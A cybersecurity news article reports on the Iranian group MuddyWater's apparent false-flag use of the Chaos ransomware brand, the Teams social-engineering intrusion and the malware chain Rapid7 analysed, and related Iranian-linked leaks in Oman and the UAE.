Iranian State-Sponsored Hackers Muddywater Accused of “False Flag” Ransomware Attack
The Iranian state-sponsored hacking group MuddyWater, also known by aliases such as Mango Sandstorm, Seedworm, and Static Kitten, has been implicated in a recent ransomware attack that cybersecurity researchers are describing as a “false flag” operation. The sophisticated cyberattack, observed in early 2026, employed social engineering tactics via Microsoft Teams to initiate its infection sequence. While initial indicators suggested the involvement of a ransomware-as-a-service (RaaS) group operating under the “Chaos” brand, further analysis points to a targeted, state-backed operation masquerading as opportunistic extortion.
This incident highlights a concerning trend where state-sponsored actors leverage the cybercriminal underground to obscure their origins and complicate attribution efforts. The attack’s methodology, which bypassed traditional ransomware encryption in favor of data exfiltration and long-term persistence, suggests a strategic objective beyond simple financial gain.
High-Touch Social Engineering and Deceptive Tactics
According to a report shared with The Hacker News by cybersecurity firm Rapid7, the campaign involved a “high-touch social engineering phase conducted via Microsoft Teams.” Attackers utilized interactive screen-sharing sessions to harvest credentials and manipulate multi-factor authentication (MFA) protocols. Once inside victim networks, the group did not proceed with the typical ransomware workflow of encrypting files.
Instead, the attackers focused on data exfiltration and establishing enduring presence within the compromised environment using remote management tools like DWAgent. This deviation from standard ransomware operations has led researchers to believe the ransomware component may have served primarily as a distraction or obfuscation tool, rather than the core objective.
The findings suggest that MuddyWater’s strategy involves an increasing reliance on off-the-shelf tools readily available within the cybercrime ecosystem. This aligns with previous observations from threat intelligence firms like Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC, which have documented the adversary’s utilization of tools such as CastleRAT and Tsundere.
This is not the first instance of MuddyWater engaging in ransomware-related activities. In September 2020, the group was linked to a campaign targeting Israeli organizations with a loader named PowGoop, which deployed a destructive variant of the Thanos ransomware. More recently, in 2023, Microsoft revealed that MuddyWater collaborated with DEV-1084, a threat actor known for using the DarkBit persona, to conduct destructive attacks under the guise of ransomware deployment. In October 2025, evidence emerged suggesting the group used the Qilin ransomware against an Israeli government hospital.
Check Point previously noted that such tactics allow Iranian-affiliated operators to use criminal ransomware brands and methods associated with the broader extortion market, effectively serving strategic Iranian objectives. The use of ransomware affiliate programs potentially provides a layer of cover and plausible deniability, particularly as enhanced security measures are in place by Israeli authorities.
The Chaos Ransomware-as-a-Service (RaaS) Framework
The “Chaos” RaaS group emerged in early 2025 and is known for its double extortion model. The group advertises its affiliate program on cybercrime forums like RAMP and RehubCom. Their attacks typically involve mail flooding and vishing (voice phishing) via Teams, often impersonating IT support to trick victims into installing remote access tools such as Microsoft Quick Assist. This initial foothold is then leveraged to penetrate deeper into the victim’s infrastructure and deploy ransomware.
Chaos has also been observed employing triple extortion tactics, which include threatening distributed denial-of-service (DDoS) attacks against the victim’s infrastructure. The RaaS model reportedly offers these capabilities as bundled services to its affiliates. Furthermore, indications suggest the group may engage in quadruple extortion, threatening to contact customers or competitors to increase pressure on victims.
As of late March 2026, Chaos has claimed responsibility for attacks on 36 victims, with the majority located in the U.S. Prominent sectors targeted include construction, manufacturing, and business services. In the specific intrusion analyzed by Rapid7, the threat actor initiated external chat requests via Teams, engaging employees to gain initial access through screen-sharing sessions. Compromised user accounts were then used for reconnaissance, establishing persistence with tools like DWAgent and AnyDesk, lateral movement, and data exfiltration, followed by ransom negotiations via email.
During compromised sessions, the threat actor reportedly executed discovery commands, accessed VPN configuration files, and prompted users to enter credentials into locally created text files. In at least one instance, the attacker deployed AnyDesk for further access facilitation. The threat actor also used RDP to download an executable, “ms_upd.exe,” from an external server using the curl utility. This binary initiates a multi-stage infection chain delivering additional malicious components.
Malware Families Involved
- ms_upd.exe (aka Stagecomp): Collects system information and communicates with a command-and-control (C2) server to deploy subsequent payloads: game.exe, WebView2Loader.dll, and visualwincomp.txt.
- game.exe (aka Darkcomp): A bespoke remote access trojan (RAT) disguised as a legitimate Microsoft WebView2 application. It’s a trojanized version of the official Microsoft WebView2APISample project.
- WebView2Loader.dll: A legitimate DLL downloaded by ms_upd.exe, required by Microsoft Edge WebView2 for embedding web content in Windows applications.
- visualwincomp.txt: An encrypted configuration file used by the RAT to retrieve C2 information.
The RAT connects to the C2 server and enters an indefinite loop, polling for new commands every 60 seconds. This allows it to execute commands and PowerShell scripts, perform file operations, and spawn interactive cmd.exe shells or PowerShell sessions.
The connection to MuddyWater stems from the use of a code-signing certificate attributed to “Donald Gay” to sign “ms_upd.exe.” This certificate has been previously utilized by the threat cluster to sign its malware, including a CastleLoader downloader named Fakeset.
Blurring Lines Between State Actors and Cybercriminals
These findings underscore the increasing convergence of state-sponsored intrusion activities and cybercriminal tradecraft. This convergence aims to obscure attribution and delay defensive responses, making it harder for organizations and governments to identify and counter threats effectively.
The use of a RaaS framework in this context is seen as a deliberate strategy to blur the distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution. Furthermore, the inclusion of extortion and negotiation elements can direct defensive efforts toward immediate impact, potentially delaying the identification of underlying persistence mechanisms established through tools like DWAgent or AnyDesk.
The apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a significant deviation from typical ransomware behavior. This inconsistency suggests the ransomware component might have functioned primarily as a facilitating or obfuscation mechanism rather than the primary objective of the intrusion.
This development coincides with reports from Hunt.io detailing an Iranian-nexus operation targeting Omani government institutions, leading to the exfiltration of over 26,000 Ministry of Justice user records, judicial case data, and SAM and SYSTEM registry hives. An open directory on a RouterHosting VPS in the United Arab Emirates exposed an active intrusion campaign against the Omani government, with the intrusion toolkit, C2 code, session logs, and exfiltrated data left openly accessible.
The discovery also aligns with continued activity from pro-Iran-aligned hacktivist groups. For instance, Handala Hack has claimed to have published details on nearly 400 U.S. Navy personnel in the Persian Gulf and conducted an attack on the Port of Fujairah in the United Arab Emirates, allegedly accessing internal systems and leaking approximately 11,000 sensitive documents including invoices, shipping records, and customs documents.
Sergey Shykevich, group manager at Check Point Research, stated that a recent documented escalation in Iranian-linked cyber operations, including surveillance, data leaks, and a rise in regional attack volume, was likely to be followed by further escalation. He characterized the claimed attack on the Port of Fujairah as such an escalation, noting a shift in the threat’s nature from intelligence gathering or public embarrassment to potentially enabling physical missile targeting. Shykevich emphasized the explicit connection between cyber and kinetic domains and predicted continued, intensified cyber activity following periods of reduced physical engagement.
The evolving tactics employed by groups like MuddyWater, utilizing RaaS frameworks and sophisticated social engineering, present a significant challenge for cybersecurity defenders. The ability of state actors to leverage the criminal ecosystem not only complicates attribution but also introduces more complex attack vectors with potentially far-reaching strategic implications.